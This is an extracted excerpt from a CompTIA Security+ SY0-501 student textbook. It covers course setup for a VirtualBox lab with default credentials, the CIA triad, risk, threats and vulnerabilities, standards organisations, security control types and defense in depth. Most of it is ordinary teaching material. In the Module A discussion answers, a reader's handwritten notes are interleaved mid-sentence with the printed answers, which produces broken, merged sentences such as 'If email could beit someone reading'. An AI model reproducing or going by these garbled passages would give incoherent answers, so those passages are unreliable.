Вы находитесь на странице: 1из 534

Instructor-Led Training

CompTIA Security+ Certification


SY0-501

Student Edition

✓ Maps to CompTIA Security+


objectives for the SY0-501 exam
✓ Realistic, simulated lab exercises
✓ Downloadable ancillaries at 30bird.com

SECP0501-R13-SCC
CompTIA Security+ Certification SY0-501
Student Edition

30 Bird Media
510 Clinton Square
Rochester NY 14604
www.30Bird.com
CompTIA Security+ Certification SY0-501
Student Edition

CEO, 30 Bird Media: Adam A. Wilcox


Series designed by: Clifford J. Coryea, Donald P. Tremblay, and Adam A Wilcox
Managing Editor: Donald P. Tremblay
Instructional Design Lead: Clifford J. Coryea
Instructional Designer: Robert S. Kulik
Keytester: Kurt J. Specht

COPYRIGHT © 2017 30 Bird Media LLC. All rights reserved


No part of this work may be reproduced or used in any other form without the prior written consent of the
publisher.
Visit www.30bird.com for more information.

Trademarks
Some of the product names and company names used in this book have been used for identification purposes
only and may be trademarks or registered trademarks of their respective manufacturers and sellers.

Disclaimer
We reserve the right to revise this publication without notice.

SECP0501-R13-SCC
Table of Contents

Introduction .................................................................................................................................... 1
Course setup ................................................................................................................2

Chapter 1: Security fundamentals ............................................................................................... 7


Module A: Security concepts ......................................................................................8
Module B: Risk management ....................................................................................22
Module C: Vulnerability assessment .........................................................................35

Chapter 2: Understanding attacks ............................................................................................. 47


Module A: Understanding attackers ..........................................................................48
Module B: Social engineering ...................................................................................52
Module C: Malware ..................................................................................................63
Module D: Network attacks ......................................................................................72
Module E: Application attacks ..................................................................................94

Chapter 3: Cryptography ........................................................................................................... 115


Module A: Cryptography concepts .........................................................................116
Module B: Public key infrastructure .......................................................................144

Chapter 4: Network fundamentals ...........................................................................................161


Module A: Network components ............................................................................162
Module B: Network addressing ..............................................................................182
Module C: Network ports and applications ............................................................194

Chapter 5: Securing networks .................................................................................................. 213


Module A: Network security components ..............................................................214
Module B: Transport encryption .............................................................................236
Module C: Hardening networks ..............................................................................259
Module D: Monitoring and detection ......................................................................267

Chapter 6: Securing hosts and data ........................................................................................287


Module A: Securing data .........................................................................................288
Module B: Securing hosts .......................................................................................308
Module C: Mobile device security ..........................................................................324

Chapter 7: Securing network services .....................................................................................337


Module A: Securing applications ............................................................................338
Module B: Virtual and cloud systems .....................................................................354

CompTIA Security+ Exam SY0-501


Chapter 8: Authentication ......................................................................................................... 369
Module A: Authentication factors ...........................................................................370
Module B: Authentication protocols .......................................................................382

Chapter 9: Access control ........................................................................................................ 403


Module A: Access control principles ......................................................................404
Module B: Account management ............................................................................417

Chapter 10: Organizational security ........................................................................................439


Module A: Security policies ....................................................................................440
Module B: User training .........................................................................................457
Module C: Physical security and safety ..................................................................461

Chapter 11: Disaster planning and recovery ...........................................................................475


Module A: Business continuity ...............................................................................476
Module B: Fault tolerance and recovery .................................................................481
Module C: Incident response ..................................................................................493

Appendix A: Glossary................................................................................................................ 503

Alphabetical Index...................................................................................................................... 517

CompTIA Security+ Exam SY0-501


Introduction
Welcome to CompTIA Security+ SY0-501. This course provides the basic knowledge needed to plan,
implement, and maintain information security in a vendor-neutral format. This includes risk management,
host and network security, authentication and access control systems, cryptography, and organizational
security. This course maps to the CompTIA Security+ certification exam. Objective coverage is marked
throughout the course and you can download an objective map from http://www.30bird.com.
You will benefit most from this course if you intend to take a CompTIA Security+ SY0-501 exam.
This course assumes that you have basic knowledge of using and maintaining individual workstations.
Knowledge equivalent to the CompTIA A+ certification is helpful but not necessary.
After completing this course, you will know how to:
 Correctly use fundamental security technology, conduct risk assessments, and plan vulnerability
assessments.
 Recognize common attacks including social engineering, malware, network attacks, and application
attacks.
 Identify fundamental network components and technologies, understand network addresses, and
recognize common network ports and applications.
 Identify common network security components and secure transport protocols, harden networks, and
apply monitoring and detection techniques.
 Explain common cryptographic techniques and standards, identify public key infrastructure concepts,
and apply transport encryption.
 Apply security controls to data, hosts, and mobile devices.
 Plan secure web applications and virtual services.
 Explain authentication factors and understand network authentication protocols.
 Recognize access control models, apply file-level access control, and centrally manage account
security.
 Apply operational security techniques through organizational policies, user training, and physical
security controls.
 Plan for disaster through business continuity plans, fault tolerant systems, data backups, and incident
response policies.

CompTIA Security+ Exam SY0-501 1


Introduction / Course setup

Course setup
To complete this course, each student will need to have a Windows client and server connected by a router
which in turn is connected to the internet, along with two specialized Linux installations; however, this is
intended to be achieved by use of virtual machines running on a single host computer. Setup instructions and
exercises assume that the host computer will be running Oracle VirtualBox, and that the virtual machines will
be one Windows 7 workstation, one Windows 2012 Server, and a pfSense router for the primary network.
There are also two specialized Linux VMs: Web Security Dojo and Kali Linux, both of which connect directly
to the network and run independently.
Hardware requirements for the host computer include:
 1.3 GHz 64-bit processor with AMD-V or Intel VT-x support (multi-core recommended)
 8 GB RAM
 100 GB total hard drive space
 DirectX 9 video card or integrated graphics, with a minimum of 128 MB of graphics memory
 A monitor with 1024x768 or higher resolution (1280x800 or higher recommended)
 Wi-Fi or Ethernet adapter

Host computer software requirements include:


 64-bit Windows or Linux
 Oracle VM VirtualBox 5.1.22 or newer.
 The Security+ SY0-501 virtual lab environment, available at http://www.30bird.com
 Five virtual machine files for VirtualBox, with links available in the setup instructions
 7-Zip for extracting the virtual machine files, available at http://www.7-zip.org/

Because the exercises in this course involve changing operating system defaults, it is recommended that each
class begin with a fresh installation of all three virtual machines. If the same installation has been used for a
previous class, some exercises will not work as written.

Note: Since the host machine is used only for running the virtual environment, it doesn't need to be
installed for each subsequent class.

1. On the host computer, install the operating system complete with all updates and service packs.
2. Install 7-Zip on either the host computer or whichever computer will extract the virtual machine files.
3. Download the VMs using the following links:
a) downloads.30bird.com/sec_plus_501/501-win7-vbox.7z
b) downloads.30bird.com/sec_plus_501/501-win2012-vbox.7z
c) downloads.30bird.com/sec_plus_501/501-pfsense-vbox.7z
d) downloads.30bird.com/sec_plus_501/501-kali-vbox.7z
e) downloads.30bird.com/sec_plus_501/501-dojo.7z
4. Extract the virtual machine files and copy them to a folder on the host computer. Each should be a single
.ova file.
5. Install Oracle VM VirtualBox, accepting all defaults during setup.
6. In VirtualBox Manager, click File > Preferences.

2 CompTIA Security+ Exam SY0-501


Introduction / Course setup

7. Add two host-only virtual networks.


a) In the network section, click the Host Only Networks tab.
b) Click Add twice to add two networks.
By default, they will be named VirtualBox Host-Only Ethernet Adapter and VirtualBox Host-Only
Ethernet Adapter #2. Each installs a virtual Ethernet card on the host computer.
8. Configure the first host-only network.
a) On the Host-only Networks tab, select the network and click Edit.
b) Edit the IPv4 Address to read 10.10.10.40.
c) Set the IPv4 Network Mask field to 255.255.255.0.
d) On the DHCP Server tab, verify that Enable server is cleared.

e) Click OK.
9. Configure the second host-only network.
a) On the Host-only Networks tab, select the network and click Edit.
b) Edit the IPv4 Address to read 10.10.20.40.
c) Set the IPv4 Network Mask field to 255.255.255.0.
d) On the DHCP Server tab, verify that Enable server is cleared.
e) Click OK.
10. Import each VM into VirtualBox.
a) In VirtualBox Manager click File > Import Appliance.
b) In the import wizard, select the .ova file you want to import, then click Next.
c) Repeat for all VMs.
11. Configure network settings for the PFsense VM.
Since pfsense serves as the in-class router, it’s very important that each adapter connect to the right
virtual network. They might not always import reliably so be sure to verify all three.
a) In VirtualBox Manager, click PFsense, then click Settings.
b) In the Network section, configure the Adapter 1 tab as follows:
• Enabled and attached to Host-only Adapter
• Name: VirtualBox Host-Only Ethernet Adapter #2
• MAC Address: 000C29C6C1C7 (For verification, do not edit this.)

CompTIA Security+ Exam SY0-501 3


Introduction / Course setup

c) Configure Adapter 2 as follows:


• Enabled and attached to Bridged Adapter
• MAC Address: 000C29C6C1D1 (For verification, do not edit this.)

d) Configure Adapter 3 as follows:


• Enabled and attached to Host-only Adapter
• Name: VirtualBox Host-Only Ethernet Adapter
• MAC Address: 000C29C6C1DB (For verification, do not edit this.)

12. Configure adapters for the other VMs.


Each of these has only one active NIC, so you just need to make sure they connect to the right network.
• Windows 7: VirtualBox Host-Only Ethernet Adapter, attached to Host-Only Adapter
• Windows Server 2012: VirtualBox Host-Only Ethernet Adapter, attached to Host-Only Adapter
• Kali: Attached to NAT
• Dojo: Attached to NAT
13. For Windows Server 2012, configure a shared "Backups" folder anywhere on the host computer.
a) Create the folder on the host computer.
b) In VirtualBox, select Windows Server 2012 then click Settings.
c) Click .
d) In the Folder Path field, navigate to the Backups folder.

4 CompTIA Security+ Exam SY0-501


Introduction / Course setup

e) Click OK.

You will need login credentials for the VMs. They are as follows:
Windows 2012/Windows Username: Administrator
7 (Domain) Password: P@ssw0rd

Note: You may be prompted to change the password on first login.

Windows 7 (Local) Username: Administrator


Password: P@ssw0rd

Note: You probably won't need to use local login for Windows 7.
Use Domain login for all classroom exercises.
pfSense Username: Admin
Password: pfsense

Kali Linux Username: root


Password: toor

CompTIA Security+ Exam SY0-501 5


Chapter 1: Security fundamentals
You will learn:
 Basic security concepts
 How to calculate and manage risk
 How to find vulnerabilities

CompTIA Security+ Exam SY0-501 7


Chapter 1: Security fundamentals / Module A: Security concepts

Module A: Security concepts


Information security is a rapidly growing and evolving field, but security itself is a topic as old as human
society. While the workings of specific attacks on networks and data might be something only a skilled
technician can fully understand and counteract, many of the principles behind securing your organization's
assets don't require any special background to understand or enforce. It's important to comprehend these basic
principles and the related terminology before you move on to the technical knowledge required of a security
professional.
You will learn:
 About the CIA triad
 How to distinguish risks, threats, and vulnerabilities
 About security controls
 How to distinguish events and incidents

About assets and threats


A lot of security discussion focuses on the many dangers faced by organizations, and for good reason, but first
it's important to understand just what's being threatened. Security is the practice of protecting assets from
anything that might do them harm. An asset can be anything of value to your organization: while information
security focuses on sensitive data and communications, overall organizational security must also consider
assets such as employees, physical property, and business relationships. Failure to protect critical assets can
be disastrous; in today's world data breaches alone can bankrupt companies, ruin lives, or lose wars.
By contrast, a threat is anything that can do harm to an asset. Security focuses largely on preventing malicious
attacks such as malware, hackers, thieves, or disgruntled employees, but those are not the only kinds of
threats. Others include accidental data loss, equipment failures, fire, natural disasters, and anything else that
can disrupt business operations. For this reason, information security experts must also work closely with
physical security personnel, computer and network technicians, safety officers, and anyone else who guards
organizational assets.
The value of an asset can greatly exceed its initial cost or even its replacement cost. Imagine if someone broke
into your office over the weekend to steal a bunch of computers and network devices. Even assuming the
thieves only stole hardware without important data, you wouldn't just have to buy new equipment and pay for
the man-hours required to set everything up again. The time needed would likely disrupt your business
operations, not only costing you revenue but possibly undermining the trust your customers and business
partners have in your timeliness and reliability. Beyond that, some assets can't be replaced at all, such as a
human life or even possession of a secret.
At the same time, you shouldn't take this general terminology to mean that all types of assets and security are
equivalent. Information security is an important field specifically because informational assets, and the threats
to them, have a number of unique properties. Physical assets can generally be stolen or destroyed only by
breaching physical security; by contrast, today's networking makes it possible for an attacker to access your
organization's sensitive information from anywhere in the world. Additionally, since information—even
information stored on physical media—isn't a physical object, it can be copied, moved, or deleted. If someone
steals your credit card, you'll know as soon as you look in your wallet. But if someone steals your credit card
information, you'll never know until you see your monthly statement, and then maybe only if you're diligent
enough to notice the unauthorized transactions. The unique properties of data assets, and the rapid evolution
of information technology, are why information security has become such a booming field.

8 CompTIA Security+ Exam SY0-501


Chapter 1: Security fundamentals / Module A: Security concepts

The CIA triad


The core of information security is commonly summed up in three components, known as the CIA triad.
Designing networks and data systems with all three components in mind doesn't just protect them against
known threats; it also makes them less vulnerable to unknown dangers.

Confidentiality Ensuring that information is viewable only by authorized users or systems, and is either
unreadable or inaccessible to unauthorized users. Confidentiality is most important for
obviously sensitive information, but even information that isn't secret in itself might be
valuable to attackers who wish to compromise your organization.
Integrity Ensuring that information remains accurate and complete over its entire lifetime. In
particular, this means making sure that data in storage or transit can't be modified in an
undetected manner, but it can encompass all methods of preventing data loss.
Availability Ensuring that information is always easily accessible to authorized users. In addition to
preventing deliberate or accidental data loss, this means making sure that connectivity and
performance are maintained at the highest possible level, and that security controls aren't
overly cumbersome for legitimate users.

You might have noticed that all three of these are goals of IT professionals even when they don't have any
secrets to keep; availability and integrity are important in any sort of data storage or transmission, and
network performance management is largely about making sure information doesn't go anywhere it doesn't
need to be. While basic functionality goals focus on how equipment failures, unintended system behavior, or
user error can affect the network, security goals also explicitly aim to defend against harm caused by
eavesdroppers, attackers, and other malicious actors.
The CIA triad is popular, but it's not all-encompassing. Some security experts suggest adding other core
principles. A common one is authenticity or trustworthiness, the ability to verify the source of information as
well as its integrity. Other sources simply consider this part of integrity. Likewise, while many sources would
count privacy, or control of personal information of users or customers, as a part of confidentiality, there are
others who count it as distinct enough to be its own category.
Other security concepts discussed along with the CIA triad are more clearly distinct since they focus on more
than the information itself. A popular addition in recent years is accountability, ensuring that employee
actions with security ramifications are tracked so they can be held accountable for inappropriate activities.
Related to this is non-repudiation, in which authenticity is verified in such a way that even the information's
author can't dispute creating it. Safety isn't usually added directly to the CIA triad, but it's closely aligned with
security principles and often discussed in similar terms.

CompTIA Security+ Exam SY0-501 9


Chapter 1: Security fundamentals / Module A: Security concepts

Risk, threats, and vulnerabilities


Terms used to describe security challenges include risks, threats, and vulnerabilities. In casual discourse, the
three might be used imprecisely, or even interchangeably; however, while they're definitely related concepts,
in security awareness they mean very different things.

Risk The chance of harm coming to an asset. Risk measurements can incorporate any combination
of the likelihood of harm, the impact it will have on the organization, and the cost of repairing
any resulting damage. Risk evaluation is essential in determining where and how security
resources should be deployed.
Threat Anything that can cause harm to an asset. These include not only attacks carried out by
malicious actors but also human error, equipment malfunction, and natural disaster. The
mechanism of a particular threat is called a threat vector or attack vector—for example,
common threat vectors can include malware, fraudulent email messages, or password
cracking attempts.
Vulnerability Any weakness the asset has against potential threats. Vulnerabilities can be hardware based,
software based, or human/organizational. Likewise, they can represent errors or shortcomings
in system design, or known trade-offs for desired features. Many attacks are exploits targeting
specific vulnerabilities known to the attacker.

Identifying threats, minimizing vulnerabilities, and calculating risks are all broad and important topics that a
security expert needs to study in depth, and the three are tightly intertwined. The end goal of security is to
minimize risk to critical assets, but in order to estimate all the risks to your assets you first need to know
which threats you are likely face and where your organization is vulnerable.

Security standards organizations


Security, and especially information security, is a community effort. Organizations of all sorts make use of the
same technologies and face many of the same threats, so learning from each other's successes and failures is
the best way to keep ahead of ever-advancing attacks and technological challenges. It's not just a matter of
swapping stories either; by using shared, proven standards for technology and policy, and a common language
for theoretical discussion, it's much easier for security professionals to share their techniques and strengthen
their own discussion.
A wide variety of organizations share security related information and standards, either as a central mission or
as one function among many. Some are government organizations, others are industry or trade groups, still
others are security consultants or software vendors, and some are independent associations of security
professionals. These organizations and their standards frequently appear in security literature as somewhat
mysterious acronyms, so you should learn to recognize them. Here are a few you're likely to encounter:

CIS The Center for Internet Security is a non-profit organization formed by a large number of
commercial, academic, and governmental bodies. The CIS's mission is to identify, develop, and
promote best practices in cybersecurity. To this end, it develops security benchmarks and
assessment tools for a wide variety of operating systems and network applications.
IEEE The Institute of Electrical and Electronics Engineers is a professional association of engineers and
scientists of many disciplines. Most relevant to information security, it includes computer
scientists, software developers, and IT professionals. The IEEE's mission is to advance
technological innovation of all sorts; one of the most visible aspects of their work is the global
IEEE standards published in a number of technological fields. One family you're likely familiar
with is the IEEE 802 networking standards, such as Ethernet (802.3) and Wi-Fi (802.11).

10 CompTIA Security+ Exam SY0-501


Chapter 1: Security fundamentals / Module A: Security concepts

IETF The Internet Engineering Task Force began with the US government agencies that first developed
TCP/IP, but it is now an open standards organization under the management of the Internet Society
(see below). All of its members are volunteers, and there are no formal membership requirements.
The IETF develops internet standards by consensus, distributing numbered Request For Comments
(RFC) documents via its internal mailing lists. A specification that advances through the review
process is classified as a Proposed Standard, and finally an Internet Standard. Not all common
protocols used on the internet are IETF standards, but a great many are.
ISO The International Organization for Standardization comprises the standards bodies of over 160
member nations. ISO standards include everything from the OSI network model (ISO/IEC 7498-1)
to twist direction in yarn (ISO 2), and many involve information technology or security standards
and practices.
ISOC The Internet Society is the parent organization of the IETF and several other organizations and
committees involved in internet development. The ISOC doesn't directly develop standards itself:
instead, it focuses primarily on providing corporate management services for its member
organizations, to speak on their behalf in internet governance discussions, and to organize internet-
related seminars, conferences, and training programs.
ITU The International Telecommunication Union is a UN agency charged with global tasks related to
telecommunications. It allocates shared global use of the radio spectrum, coordinates national
governments in assigning satellite orbits, and promotes global technical standards related to
networking and communication. Many ITU standards can be recognized by their "letter-period-
number" format; two you might have heard of are X.509 (Digital certificates) used by secure
websites, and H.264 (MPEG-4) used for digital video encoding both on the internet and by
television providers.
NIST The National Institute of Standards and Technology is a US government agency charged with
developing and supporting standards used by other government organizations. While it primarily
promotes standards for use by the US government, they frequently are used by others with similar
technology needs. In recent years, computer security standards have become a major part of its
mission. NIST shares most of its findings with the security community in general, and regularly
publishes information about known software vulnerabilities and security best practices.
NSA The National Security Agency is a US signals intelligence organization whose responsibilities
include information gathering, codebreaking, and codemaking. The NSA develops cryptographic
standards and secures government information against attack. While much of its work is classified,
the NSA has had a role in designing and standardizing some of the most widely used cryptographic
standards, such as DES, AES, and SHA.
W3C The World Wide Web Consortium is a standards organization founded to develop and maintain
interoperable standards for the World Wide Web (WWW) used by web browsers and servers as well
as other technologies. W3C standards include HTML, XML, CSS, and many others used for web-
based communications. While the W3C doesn't focus on security technologies per se, security of
web standards is a major topic in the wider field of information security.

To make things more complicated, a given technology might exist as a standard from multiple organizations
at once and thus have multiple designations. You'll need to be familiar with the most common security
standards, but there are so many that even the most experienced security professional has to stop and look
them up sometimes.

CompTIA Security+ Exam SY0-501 11


Chapter 1: Security fundamentals / Module A: Security concepts

Alice and Bob


Every technical field has examples of nicknames and other jargon that aren't technically defined but still
provide a common language for students and experts alike to communicate about an important concept. In
cryptography, and secure communications in general, you should get to know "Alice and Bob" as well as their
many associates. Alice and Bob are placeholder names for "Party A" and "Party B," humans or computer
programs trying to communicate with each other. In the typical example, Alice wants to send Bob a secure
message. Other common placeholder names represent other parties in the communication, malicious
attackers, neutral observers, and helpful assistants.

Note: Alice and Bob themselves first appeared in papers published by cryptographer Ron Rivest in
1977-1978, and the rest of the cast developed over time. Many were introduced or "standardized" in the
1994 book Applied Cryptography by Bruce Schneier.

 Additional participants follow with names in alphabetical order: Carol (C), Dave (D), Erin (E), Frank
(F), and so on.
 Some other names represent malicious participants: Eve the eavesdropper, Craig the password cracker,
or Mallory who modifies data in transit.
 Additional names vary by source and the protocol being discussed. In general, the name (or at least its
first letter) indicates that person's role.

Discussion: Security concepts


1. Consider a network service you use regularly, such as email. How could its confidentiality be
compromised?
One example
If email could beit someone
is not encrypted, reading
is transported in clear or
textintercepting it. can be read by third party.
and if intercepted,

2. How could its integrity be compromised?


If emailcould
Mail was intercepted
be alteredby when
man-in-the-middle
you send foror example,
receive itit.can be modified and passed on to recepient.
3. How could its availability be compromised?
IfYou could
attacker be unable
performs DoS ortoDDoS
access your
against mail
mail when
server, you
it can getneed to. hence no mail can be delivered.
shut down,

4. There's been a rash of burglaries in your area, and you notice that one door into part of the building with
valuable equipment has a keypad lock set to "12345." Identify the asset, the vulnerability, the threat, and
the risk in the situation.
The- asset
asset equipmentis the valuable equipment in the building. The vulnerability is an easily guessed access code
vulnerability
that makes - weak
thelocklock
code,simple
no alarm,to
nobypass.
camera The threat is burglars in the area. The risk is the combination of
threat - thief can easily access the equipment
risk - if thief gains access to this part of building, equipment can potentially be stolen

12 CompTIA Security+ Exam SY0-501


Chapter 1: Security fundamentals / Module A: Security concepts

how likely you are to be burglarized, how hard stolen equipment would be to replace, and how much its
loss would otherwise affect your business.
5. You've set a stronger passcode and added a security alarm. How does this affect the vulnerability, threat,
and risk of the situation?
Strengthened or added security measures reduce vulnerabilities, which in turn reduces risk. In this case,
vulnerability - level has decreased by adding stronger code and alarm system
the- threat
threat still exist,is
butunchanged: the burglars
thief might be deterred are tostill
from attempting stealout there, just
the equioment due less likelyfortoaccessing
to complexity enter unnoticed.
the equipment itself
risk - lowered by introducing additional and improved security measured

Security controls
The tools and measures used to achieve security goals are called security controls. A security control can be
anything that protects your assets: the network firewall, the locks on your doors, even the company policy on
data backups. There are multiple ways to categorize the wide range of controls used by modern organizations.
One way is to categorize a control by the goal it furthers, such as confidentiality, integrity, or availability.
Other categorizations focus on the control's functional nature, or simply on how it acts.

Exam Objective: CompTIA SY0-501 5.7.1, 5.7.2, 5.7.3, 5.7.4, 5.7.6, 5.7.7, 5.7.8
A control's functional nature can fall into three or four general categories, depending on how it works and
who implements it.

Administrative Also known as procedural or management controls, these represent organizational


policies and training regarding security. Management controls define the other control
types in use by an organization, so they're the starting point for implementing security.
Common management controls include password policies, employee screening, training
procedures, and compliance with legal regulations.
Technical Technological solutions used to enforce security, sometimes also called logical controls.
Technical controls include firewalls, authentication systems, and encryption protocols,
among others. In modern data systems, technical controls do a great amount of the work
and require the most exacting knowledge, but they're still only as effective as the human
activities behind their implementation and enforcement.
Operational Day-to-day employee activities that are used to achieve security goals. These are often
defined by policies but are effective only in the proper execution of secure practices.
Operational controls include backup management, security assessments, and incident
response.
Physical Methods used to guarantee the physical security and safety of organizational assets.
Physical controls can include locks, fences, video surveillance, and security guards.

You can also classify a control according to when it acts.

Preventive Proactive controls that act to prevent a loss from occurring in the first place. Preventive controls
include locked doors, network firewalls to block intrusion, and policies designed to minimize
vulnerabilities. Ideally, preventive controls work well enough that the other types are just
backup, but since that's not likely in the real world you can't ignore the others.
Detective Monitoring controls that either detect an active threat as it occurs, or record it for later
evidence. Either way, detective controls primarily serve to notify security personnel who can
take preventive or corrective measures, rather than secure assets themselves. Common detective
controls include security cameras, network logs, auditing policies, and physical or network
alarms.

CompTIA Security+ Exam SY0-501 13


Chapter 1: Security fundamentals / Module A: Security concepts

Corrective Follow-up controls used to minimize the harm caused by a security breach and to prevent its
recurrence. Corrective controls include measures such as restoring data from backups, changing
compromised passwords, or patching vulnerable systems. Ideally, a corrective control leaves
the system more secure than it was before the threat occurred.
Deterrent Visible controls designed to discourage attack or intrusion, especially in physical security. A
locked door might be a preventive control and a security camera a detective one, but the "NO
TRESSPASSING" sign and the visibility of the camera might be what actually convinces a
casual attacker not to go in even if the door is unlocked. Deterrent controls also include
disciplinary policies or training used to discourage employees from ignoring proper security
practices out of convenience.

A given security system can act on multiple levels. For example, a visible camera is both deterrent and
detective, while an authentication system that responds to failed logins by locking the account and notifying
an administrator is preventive and detective.

Confidentiality controls
Every organization has sensitive data. Even if yours doesn't have trade secrets or customer information that
are valuable assets in themselves, it almost certainly has private employee data, or even security configuration
settings that can be used to bypass your other security controls. Keeping this data out of the wrong hands is a
primary goal of information security, so many controls are designed just for this purpose.
Many of the most effective confidentiality controls aren't technological, but rather policy-based. By
controlling where data is kept, and who has access to it, you can reduce its exposure in the first place. Some
important confidentiality policy principles include the following.

Least privilege Users are given only the permissions they need to perform their actual duties. Think of it
like not giving every employee the key to every lock in the building; not only doesn't
maintenance staff not need to get into the financial filing cabinet, the accountants don't
need to get into the mechanical room. This not only prevents harm by malicious
employees, it also reduces the opportunities for an outside attacker to steal a particular key.
In cybersecurity, least privilege can be enforced on the human level by policies, or on the
technical level by system or account permissions.
Need to know Similar to least privilege but focused on restricting data access to only those individuals
who actually need it. Need to know includes restricting who can access a particular sort of
data in the first place, but it doesn't stop there. Even when users have permission to access
data of a certain type and sensitivity, a need-to-know policy can restrict them to specific
information and records that they actually need, rather than allowing casual browsing that
might lead to security risks.
Separation of Breaking critical tasks into components, each of which are performed by a different
duties employee with different permissions. When handling sensitive data this can work
counterintuitively since it brings more people into managing secrets, but it also limits the
damage a single dishonest or careless employee can do without being discovered by others
involved in the process. Separation of duties can apply to technological systems as well as
people—that way a security compromise in one component can do less damage.

Technical confidentiality controls are increasingly common, especially as networks have become such a vital
part of information technology. Systems accessible from the internet, or information transmitted over it, create
significant new challenges for confidentiality.

14 CompTIA Security+ Exam SY0-501


Chapter 1: Security fundamentals / Module A: Security concepts

Access controls Restrict access to systems and other resources, typically by means of a password, smart
card, or other authentication method. Secure access control systems not only prevent
unauthorized access, they also enforce user permissions for authorized users and log
activity for later review.
Encryption Uses mathematical processes to render data unreadable to those without the proper
decryption key. Encryption is widely used to secure communications, but there are a many
technological challenges involved in making sure it really is secure.
Steganography The practice of concealing a secret message inside a more ordinary one—for example, a
hidden watermark used to show a document's origin should it be stolen or copied. The
hidden message itself might be encrypted as well, or it might rely simply on being hard to
discover in the first place.

Integrity controls
Even when data isn't confidential, you need to make sure it isn't deleted or changed, either by an attacker or
just by technical or user error. Like with confidentiality, policies and permissions are a big part of this, but
really verifying data changes on digital systems is difficult without the right technical controls.

Hashing Mathematical functions designed to create a small, fixed-size fingerprint of a given


message or file, such that any small change in the original data will produce an entirely
different hash. Some hashes are only designed to protect against accidental data changes,
while others cryptographic formulas intended to foil malicious modifications.
Digital signatures A combination of hashing and other cryptography used not only to demonstrate that a
message hasn't been altered, but to verify the authenticity of its creator. Digital
signatures can be used to create digital authentication tools called certificates, and can be
used as a method of non-repudiation in much the same way that a physical signature can.
Backups When data is changed or lost, regular and complete backups can be used to restore it to
its original form. Effective backup systems require policies governing what is backed up
and when, technical methods for the process itself, and security controls to protect the
data in the backup copy.
Version control Storing multiple versions of files meant for frequent and collaborative change, such as
documents, code repositories, and other collections of documents. Version control
systems don't prevent data from being changed or deleted, but automatically track
changes and allow easy reversion to the original state.

Availability controls
It's costly when your organization's data and other resources aren't available to those who need it, when they
need it. Apart from any other harm done by a security incident, the more it disrupts your business operations
the more harm it will do. In fact, many attacks are designed to damage solely by targeting availability.
There are a number of security controls used to enhance availability both during routine operations, and
during or after attacks or system errors. Exactly how aggressive these controls need to be depends on how
critical a resource's availability is.

Note: Availability is typically described in the percentage of the time a system or resource is expected to
be operating and responsive. For example, a high availability system rated for 99.999% availability (or
"five nines") should be down no more than 5.26 minutes per year.
Many availability controls work by removing a single point of failure, any component which can disrupt
overall system functions if it fails.

CompTIA Security+ Exam SY0-501 15


Chapter 1: Security fundamentals / Module A: Security concepts

Redundancy Multiple or backup systems arranged so that if one fails, others can take its place immediately
or at least more quickly than the original can be repaired. Redundancies can include multiple
identical servers able to perform the same function, backup systems that can be quickly
brought online, or even entire backup sites for use in case of natural disaster. Redundant
systems typically have manual or automatically triggered failover features which allow
functions to switch from a failed system to its backup in a way that's transparent to the user.
Fault A system designed to continue functioning if a hardware or software component fails. Often
tolerance this is done via redundant components: for example, RAID storage uses multiple redundant
disks so that if one fails it can be replaced without data loss or even interrupting operations.
Other fault tolerant systems include software that will automatically resume operations after
encountering errors, and backup electrical power sources such as UPS or generators.
Patch Whether security and stability updates are being applied proactively or in response to a
management security incident, it's important to make sure they don't disrupt system availability. Some
patches, often known as hotfixes, can be applied to a system with no or minimal downtime.
Otherwise, to maximize availability you can schedule downtimes to coincide with low usage
periods.

Compensating controls
One other control type is the compensating control. This is more a regulatory term than really describing how
or where the control works. Sometimes security requirements, especially from regulatory agencies, will
specify controls that your specific system configuration or field of business makes impossible or impractical,
at least your next major upgrade. A compensating control is an alternative control that doesn't match the letter
of the requirement but gives comparable or better protection.

Exam Objective: CompTIA SY0-501 5.7.5


For example, if a security standard specifies a type of process should use separation of duties, but there's no
way to do that in your company, you could use increased logging and managerial oversight. That way it
would be just as impractical for a single dishonest employee to make trouble. If you're required to send
certain messages "over an encrypted network" but for technical reasons you can't encrypt the entire network
or build a separate one, you could use an email or instant messaging program that uses strong encryption on
all its communications. It can even be temporary: if the lock to that secured room breaks, keeping a guard at
the door until you can fix it is a compensatory control.
Since they're usually used for regulatory compliance, compensating controls should always have a good
reason that an auditor will accept. "That's hard" or "I don't feel like it" doesn't count even if the substituted
control is just as good as the original. Budgetary or technical constraints might be fine, especially if it's just
until you get a cleaner solution in place.

Discussion: Security controls


Consider security controls you commonly encounter within your own organization.
1. What confidentiality controls are in place?
Answers may vary.
2. What integrity measures are in place?
Answers may vary.
3. What availability measures are in place?
Answers may vary.

16 CompTIA Security+ Exam SY0-501


Chapter 1: Security fundamentals / Module A: Security concepts

Defense in depth
Security controls don't exist in isolation. Instead, they're part of an interleaved whole designed to protect your
organization's assets. Just like a locked door isn't very useful if it's right next to an open window, you need to
make sure that attackers can't bypass or overcome one security control and gain full access. Most obviously
this means you want to keep a complete "shell" around your assets that no one can just slip past, but you also
need to make sure that just finding a single weak point doesn't leave the attacker awash in undefended data.
Instead, security experts recommend a defense in depth strategy where comprehensive security controls exist
on all levels of your organization.

Exam Objective: CompTIA SY0-501 3.1.3.1, 3.1.3.2

Defense in depth strategies typically define multiple layers on which the organization needs to be secured.
Those layers define where you need to look when you set up security systems, and when you troubleshoot
security issues.
 Data
 Application
 Host
 Internal network
 Perimeter network
 Physical facility
 Users and organization

CompTIA Security+ Exam SY0-501 17


Chapter 1: Security fundamentals / Module A: Security concepts

Don't take the diagram too literally when you think about security plans: it's not a video game where an
attacker has to fight through each room in sequence to get the treasure, it's just an effort to make sure that no
one flaw will compromise everything. That's not easy. The data attackers are ultimately after may "live" on
servers you can monitor closely, but it's also flowing through wires, carried on users' personal devices, and
literally flying through the air. Likewise, an attacker who gains too much physical access or employee trust
can exploit them to bypass many other security methods.
Also remember that security risks aren't just about theft of data, but about attacks or other incidents that will
disrupt business functions. On every level, you need to identify critical assets: the ones that can't be easily
replaced, or which will immediately disrupt organizational functions if they're compromised. For the network
especially, this often means the critical nodes the network needs to function, like essential servers or
backbone routers.
Defense in depth doesn't even just describe parts of your organization: a single layer can be made more secure
by applying multiple complementary controls. Even if they're all physical security, having locked doors,
cameras, and patrolling guards is stronger protection for a secure facility than any one of the above. Even with
the same type of control, vendor diversity can add security. Having two network firewalls made by two
different vendors means if an attacker learns a vulnerability in one it might not work on the other.
Exactly how far you need to take security precautions on any of these levels depends on the precise needs of
your organization. A lot of security controls are good practice even for casual home users, while other
measures are meant for organizations that need to protect highly sensitive data at extreme risk.

Security by design
